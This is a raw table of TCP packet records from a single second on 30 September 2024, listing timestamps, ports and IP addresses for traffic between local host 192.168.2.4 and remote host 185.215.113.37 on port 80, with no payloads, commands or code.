Sep 30, 2024 07:08:01.283612013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.283653021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.283665895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.283678055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.283688068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.283693075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.283700943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.283724070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.283755064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284401894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284414053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284424067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284449100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284466028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284476995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284476995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284487963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284502029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284513950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284528971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284538031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284559965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284576893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284611940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284622908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284632921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284643888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284653902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.284655094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284683943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.284701109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285355091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285367966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285377979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285397053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285414934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285414934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285428047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285439968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285454035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285480976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285537004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285548925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285558939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285568953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285579920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285579920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285594940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285609007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285617113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.285638094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.285654068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.286227942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.286273956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.367331982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.367342949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.367348909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.367489100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.367499113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.367641926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.367641926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.409991026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410005093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410022020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410032988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410043955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410053968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410063982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410073996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410080910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410084963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410098076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410110950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410124063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410132885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410135984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410149097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410149097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410173893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410197020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410212994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410240889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410250902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410257101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410263062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410278082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410286903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410309076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410326004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410353899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410370111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410382032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410398006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410428047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410430908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410444021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410475016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410504103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410610914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410623074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410633087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410646915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410656929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410657883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410679102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410710096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410733938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410747051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410789967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410805941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410816908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410818100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410835028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410845995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410852909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410871983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410893917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.410984993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.410996914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411006927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411029100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411056995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411060095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411072016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411082029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411092997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411103010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411104918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411134958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411159992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411268950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411313057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411324024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411339998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411353111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411370993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411380053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411396027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411406040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411417961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411426067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411448002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411468983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411516905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411531925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411542892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411554098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411565065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411570072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411575079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.411591053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.411627054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.414927959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.414973021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.414983034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.414990902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415014029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415030003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415036917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415047884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415056944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415065050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415075064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415081024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415101051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415132046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415179014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415189028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415198088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415203094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415211916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415221930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415226936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415239096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415251017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415260077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415270090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415294886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415469885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415510893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415519953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415550947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415555000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415595055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415620089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415630102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415657997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415668011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415669918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415678978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415708065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415733099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415787935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415831089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415837049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415848017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415884018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415895939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415915966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415929079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415937901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415949106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.415961027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415982962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.415992022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416003942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416006088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416014910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416028976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416038036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416060925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416085005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416220903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416238070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416248083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416276932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416290045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416336060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416347027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416357040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416368961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416378021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416426897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416465998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416477919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416490078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416501045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416512012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416517973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416523933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416534901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416539907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416551113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416574955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416596889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416841030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416851997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416862011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.416887999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.416912079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.454065084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454117060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454128981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454164028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.454174042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454186916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454193115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.454205036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454216957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.454216957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.454247952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.454273939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496484995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496501923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496512890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496530056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496541023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496551037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496551991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496562958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496583939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496592045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496592045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496613026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496627092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496660948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496673107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496684074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496704102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496727943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496730089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496742010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496753931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.496766090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.496799946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497175932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497186899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497196913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497229099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497248888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497271061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497282982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497292995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497320890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497339010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497368097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497380018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497390032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497400999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497411966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497412920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497426987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497437954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497457027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497478008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497508049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497519970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497529984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497540951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497553110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497572899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497589111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497601032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497612953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497622967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497633934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497642994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497647047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497654915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497663975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497668028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497685909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497695923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497715950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497723103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497772932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497811079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497813940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497823000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497852087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497860909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497899055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497910976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497920990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497931957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497941971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.497942924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497961998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.497987986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498105049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498116016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498126030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498136044 CEST	80	49730	185.215.113.37	192.168.2.4
